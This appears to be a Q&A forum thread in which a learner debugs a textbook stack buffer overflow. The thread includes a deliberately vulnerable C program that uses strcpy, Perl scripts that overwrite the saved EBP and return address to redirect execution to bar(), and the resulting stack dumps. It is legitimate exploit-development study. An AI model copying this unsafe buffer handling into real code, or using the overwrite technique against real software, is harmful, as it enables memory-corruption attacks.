# EBP bypass problem

Tags: buffer-overflow

I am kinda new to exploit development using buffer overflows. I've come across a sample code in one book I refer to, and the sample code doesn't execute properly.
Here is my code...

```
#pragma check_stack(off)

void foo(const char* input)
{
    char buf[10];
    printf("stack is: \n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
    strcpy(buf,input);
    printf("%s\n",buf);
    printf("Stack is now:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}

void bar(void)
{
    printf("Hacked");
}
int main(int argc, char* argv[])
{
    printf("Address of foo is %p\n",foo);
    printf("Address of bar is %p\n",bar);
    if(argc!=2)
    {
        printf("Please supply a string as an argument");
        return -1;
    }
    foo(argv[1]);
    return 0;
}
```

I compile my code using MinGW compiler suite for windows, and when I run the
program from the command line, I see output of the stack content.

> Address of foo is 00401340
>
> Address of bar is 0040137D
>
> stack is:
>
> 00401280
>
> 0032D000
>
> 0000001B
>
> 0060FECC
>
> B76EDE61
>
> 0060FFCC
>
> 7786D1F0
>
> B76EDBA9
>
> FFFFFFFE
>
> 0060FF18
>
> 004013F0
>
> Hello
>
> Stack is now:
>
> 00710CFA
>
> 0032D000
>
> 0000001B
>
> 0060FECC
>
> 6548DE61
>
> 006F6C6C
>
> 7786D1F0
>
> B76EDBA9
>
> FFFFFFFE
>
> 0060FF18
>
> 004013F0

So far so good, I get to see the start of my buffer, and also the return address of the function, in this case `0x004013F0`. Also, the *EBP* stands at `0x0060FF18`. 
The problem starts when I supply input that overwrites the *EBP*. Even when the *EBP* is overwritten, I get an error and my program crashes. My main aim is to overwrite the return address to get the program execute bar(). I forcibly overwrite the *EBP* and then also supply input that changes the return address to bar(), bar gets executed, but my program crashes.
I've tried a perl script that sends address as compiled input. I craft my input so that the *EBP* value doesn't change.

```
$arg="AAAAAAAAAAAAAAAAAA"."\x18\xFF\x60\x00\x7D\x13\x40\x00";
$cmd="ydy ".$arg;
system($cmd);
```

In this case, the return address doesn't get overwritten. But if I change the address to

```
$arg="AAAAAAAAAAAAAAAAAA"."\x12\xFF\x60\x00\x7D\x13\x40\x00";
$cmd="sample ".$arg;
system($cmd);
```

The *EBP* is overwritten and also return address. bar() is executed but programme crashes. My questions are:
    1. Why does *EBP* corruption causing program crash? I've never known it does.
    2. Why isn't the return address getting overwritten in case 1 of the script, but gets overwritten when the crafted input does overwrite *EBP*?

I know it's long, kindly help me out.
Thanks.

Answer (score 0, accepted):

> 1. Why does EBP corruption causing program crash?

The EBP (Extended Base Pointer) register points to the base of the current function's stack frame. Some compilers use it to find local variables within the stack frame. For example, if you have two local ints in your function, the compiler might access them with `*(ebp - 4)` and `*(ebp - 8)`.

The EBP for the previous function (i.e. the one we will return to) is saved in the current function's stack frame. This is presumably the `0x0060ff18` that you see. If we modify this saved EBP, then the function we return to will have an invalid EBP and will look for local variables in the wrong place (e.g. since `*(ebp - 4)` now points to a different location).

> 2. Why isn't the return address getting overwritten?

I don't think the return address should be overwritten in either case, since your argument contains a null byte (`\x00`) before the new return address. Null bytes are used to terminate strings in C, so any characters after the first null byte will be ignored.

Comment: Thanks for the answer, but is the EBP of previous stack frame the address to which we would return to? Isn't it the EIP which is below the EBP in the stack the address to which we would return? In essence, is there a difference between return address and previous stack frame EBP address? But still, my return address gets overwritten when i corrupt the EBP. @grc

Comment: @Vinay The EBP register always points to the bottom of the current stack frame - it points to the stack, not code, so you never "return" to that address. The EIP register always points to the next instruction to be executed. When you return from a function, it loads the saved address from the stack into EIP. The return address shouldn't be overwritten - could you post the output of your perl script?

Comment: That was really helped me out buddy, thanks. Here is the output you asked....

Comment: <code>Address of foo is 00401340
Address of bar is 0040137D
stack is:
00401280
0032C000
0000001B
0060FECC
CEFC5071
0060FFCC
757FD1F0
CEFC55B9
FFFFFFFE
0060FF18
004013F0

AAAAAAAAAAAAAAAAAA `}@
Stack is now:
00AD0CFA
0032C000
0000001B
0060FECC
41415071
41414141
41414141
41414141
41414141
1060FF18
0040137D

Hacked</code>..... I gave it input by changing the null byte as you said and it worked. yet the program crashes. Is there a way i could send data so that it doesn't involve the null byte, but gets saved as \x00 in EBP, so that my program wouldn't crash?

Comment: @Vinay I don't think there are any easy ways to avoid this. But the important thing is that `bar()` works fine - crashing *after* you return execution to the program isn't a big issue. If you were writing an exploit you could restore EBP manually to avoid the crash.

Comment: Thanks pal...if you don't mind could you point out some references or something on how i can manually overwrite the EBP after bar executes? Could you give me some help? :D

Comment: @Vinay It would involve jumping into your own assembly code rather than bar directly. I'm not sure if that's even possible in this example (depends on the protections).